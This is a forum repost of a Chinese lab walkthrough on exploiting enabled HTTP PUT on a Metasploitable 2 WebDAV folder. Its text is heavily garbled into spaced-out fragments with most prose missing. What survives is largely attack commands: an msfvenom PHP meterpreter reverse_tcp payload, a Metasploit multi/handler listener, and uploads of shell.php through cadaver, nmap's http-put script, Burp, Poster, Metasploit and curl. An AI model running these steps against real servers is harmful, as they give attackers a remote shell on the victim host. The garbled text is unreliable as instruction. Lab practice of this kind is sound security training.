[16562] 2021-03-17_安全研究多种方式利用HTTPPUT方法漏洞

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2021-03-17_安全研究多种方式利用HTTPPUT方法漏洞   |   H T T P   P U T c l o u d s   F r e e B u f   2 0 2 1 - 0 3 - 1 7 H T T P   P U T H T T P   P U T M e t e r p r e t e r s h e l l H T T P   P U T H T T P   P U T 访 M e t a s p l o i t a b l e   2   - I P 1 9 2 . 1 6 8 . 1 . 1 0 3 K a l i   L i n u x   - I P   1 9 2 . 1 6 8 . 1 . 1 0 5 N i k t o H T T P   P U T K a l i   L i n u x   I P 1 9 2 . 1 6 8 . 1 . 1 0 5 I P 1 9 2 . 1 6 8 . 1 . 1 0 3 W e b D A V W e b D A V H T T P   G E T P U T P O S T G E T H T T P   P U T N i k t o n i k t o   - h   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v /
H T T P   P U T P H P M s f v e n o m S h e l l M s f v e n o m P H P S h e l l S h e l l P H P < ? p h p d i e ( ) s h e l l . p h p D e s k t o p m s f c o n s o l e M e t a s p l o i t 使 m u l t i / h a n d l e r P H P   s h e l l C a d a v e r H T T P   P U T C a d a v e r K a l i W e b D A V d a v s h e l l . p h p m s f v e n o m   - p   p h p / m e t e r p r e t e r / r e v e r s e _ t c p   l h o s t = 1 9 2 . 1 6 8 . 1 . 1 0 5   l p o r t = 4 4 4 4   - f   r a w c a d a v e r   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v / p u t   / r o o t / D e s k t o p / s h e l l . p h p
访 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v / s h e l l . p h p 使 M e t a s p l o i t m u l t i / h a n d l e r L H O S T   L P O R T e x p l o i t 1 9 2 . 1 6 8 . 1 . 1 0 5 : 4 4 4 4 访 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v / s h e l l . p h p 访 M e t a s p l o i t m e t e r p r e t e r > s y s i n f o N m a p H T T P   P U T N m a p P U T N m a p s h e l l / d a v / s h e l l s h e l l . p h p n m a p . p h p m s f >   u s e   e x p l o i t / m u l t i / h a n d l e r m s f   e x p l o i t ( h a n d l e r )   >   s e t   p a y l o a d   p h p / m e t e r p r e t e r / r e v e r s e _ t c p m s f   e x p l o i t ( h a n d l e r )   >   s e t   l h o s t   1 9 2 . 1 6 8 . 1 . 1 0 5 m s f   e x p l o i t ( h a n d l e r )   >   s e t   l p o r t   4 4 4 4 m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t n m a p   - p   8 0   1 9 2 . 1 6 8 . 1 . 1 0 3   s c r i p t   h t t p - p u t   s c r i p t - a r g s   h t t p - p u t . u r l = / d a v / n m a p . p h p , h t t p - p u t . f i l e = / r o o t / D e s k t o p / n m a p . p h p
n m a p . p h p U R L 访 使 M e t a s p l o i t m u l t i / h a n d l e r L H O S T   L P O R T 1 9 2 . 1 6 8 . 1 . 1 0 5 : 4 4 4 4 访 n m a p . p h p M e t a s p l o i t s h e l l P o s t e r H T T P   P U T P o s t e r F i r e f o x W e b H T T P G E T ,   P O S T ,   P U T   D E L E T E p o s t e r . p h p s h e l l . p h p F i r e f o x P o s t e r F i r e f o x P o s t e r U R L U R L p o s t e r . p h p P U T
访 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v p o s t e r . p h p 使 M e t a s p l o i t m u l t i / h a n d l e r L H O S T   L P O R T 1 9 2 . 1 6 8 . 1 . 1 0 5 : 4 4 4 4 访 p o s t e r . p h p M e t a s p l o i t s h e l l B u r p s u i t e H T T P   P U T B u r p s u i t e I n t e r c e p t I n t e r c e p t   i s   o n 访 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 3 G E T :
S e n d   t o   t h e   r e p e a t e r G E T 访 P U T P U T   / d a v / b u r p . p h p   H T T P / 1 . 1 s h e l l . p h p P U T 访 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v b u r p . p h p 使 M e t a s p l o i t m u l t i / h a n d l e r L H O S T   L P O R T 1 9 2 . 1 6 8 . 1 . 1 0 5 : 4 4 4 4 访 b u r p . p h p M e t a s p l o i t s h e l l
M e t a s p l o i t H T T P   P U T M e t a s p l o i t P U T a u x i l i a r y / s c a n n e r / h t t p / h t t p _ p u t s h e l l m e t e r . p h p 访 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v m e t e r . p h p 使 M e t a s p l o i t m u l t i / h a n d l e r 访 m e t e r . p h p M e t a s p l o i t s h e l l c U R L H T T P   P U T c U R L c U R L H T T P H T T P S ,   F T P ,   S C P ,   L D A P ,   T e l n e t s h e l l c u r l . p h p : c u r l   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v /   u p l o a d - f i l e   / r o o t / D e s k t o p / c u r l . p h p   - v
访 1 9 2 . 1 6 8 . 1 . 1 0 3 / d a v c u r l . p h p 使 M e t a s p l o i t m u l t i / h a n d l e r 访 c u r l . p h p s h e l l

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则